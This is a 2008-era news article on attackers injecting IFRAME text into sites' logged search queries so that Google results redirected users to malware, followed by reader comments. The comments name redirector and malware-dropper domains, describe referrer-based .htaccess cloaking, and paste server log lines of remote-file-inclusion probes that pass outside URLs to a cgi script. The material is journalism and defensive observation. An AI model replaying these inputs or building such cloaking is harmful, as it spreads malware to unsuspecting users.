Hackers find clever new way to hose Google users
Updated Hackers have found a new way to get Google to point to malicious websites with the help of unwitting websites such as TorrentReactor, ZDNet Asia and several other CNET-owned properties.
As a result, more than 101,000 Google search results that appeared to lead to pages of legitimate sites actually directed end users to sites that attempted to install malware.
The hack, which was first documented Wednesday by Netherlands-based researcher Dancho Danchev, takes advantage of the practice by many sites of logging search queries typed into their search boxes and storing them where search engine bots can see them. The terms are then indexed by Google and other search engines and included in the results they return. Exploiting the weakness is as easy as typing popular search terms into a popular website along with the text of an IFRAME that points to a malicious website. Within time, the strings will be included in results returned by Google and others.
Google goes to great lengths to protect users against by warning when a website included in search results is believed to be malicious. But at time of writing, queries on Google for "jamie presley," "mari misato" and "risa coda" got one or more poisoned link in the first 10 results. Almost 52,000 Google results contained such redirects for ZDNet Asia, according to this update Danchev made on Thursday. There were almost 50,000 poisoned links for TV.com sites and a handful for News.com and MySimon.com, Danchev said.
"The folks at ZDNet Asia have taken care of the IFRAME issue, so that such injection is no longer possible," he added."
In the second half of 2007, 51 per cent of sites hosting malware were legitimate destinations that had been compromised, as opposed to sites specifically set up by criminals, according to security firm Finjan. In the case here, neither ZDNet Asia nor TorrentReactor were compromised, although the criminals were clearly taking advantage of their strong page ranking and the trust that many end users have in them.
The injected IFRAME redirects unwitting users to sites associated with the Russian Business Network, F-Secure says. The sites try to install malicious programs with names including XP Antivirus 2008 and Spy Shredder Scanner.
The attackers are also notable for the care they've taken to cover their tracks. The malicious sites will only attack users who click on the link as it's returned from Google or another major search engine. Client-side honeypots or security researchers who merely type the address into a browser will receive an error message indicating the site is unavailable. ®
.... and if you refer to the ISO country listings, there is no Holland - only Netherlands
Same group that's going after iPower
The attacks which are still ongoing against Web sites hosted by US Web host iPower use the same technique to mask themselves from anything but a Google search, and redirect to the same payload sites.
The basic system is straightforward. Hack into a poorly-secured Web site or inject code into an unsanitized script that redirects to traffloader.info, which is a round-Robin-style redirector that in turn redirects the unfortunate visitor to one of several malware droppers. Some of the more common ones I've seen are scanner.spyshredderscanner.com, xpantivirus.com, or sites masquerading as porn sites which try to drop a Trojan disguised as a movie codec.
In each case, the redirectors or compromised Web sites are protected by an .htaccess file that checks the browser's referrer. If it's "google.com" they redirect, if it isn't they redirect to a 404 error.
iPower has been massively compromised for months, and are still compromised; I've made lists of thousands of Web sites they host which have been hacked and had these redirectors placed on them. The fact that the techniques used are the same and the payload sites are the same strongly suggests that the folks who waltzed into iPower and pwned their servers are the same folks behind this iFrame exploit.
In this day and age, it kind of surprises me that there's still anyone left in the world who is foolish enough not to sanitize any user-supplied input anywhere on their sites--even in search boxes.
I've been seeing this from the hosting side for a few months now.
galadriel.netgroup.cz - - [03/Mar/2008:10:02:12 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
galadriel.netgroup.cz - - [03/Mar/2008:10:02:13 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
galadriel.netgroup.cz - - [03/Mar/2008:10:02:15 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
Randomly changing cgi fields with the full address of compromised servers.
trying to cache in on everyones machines.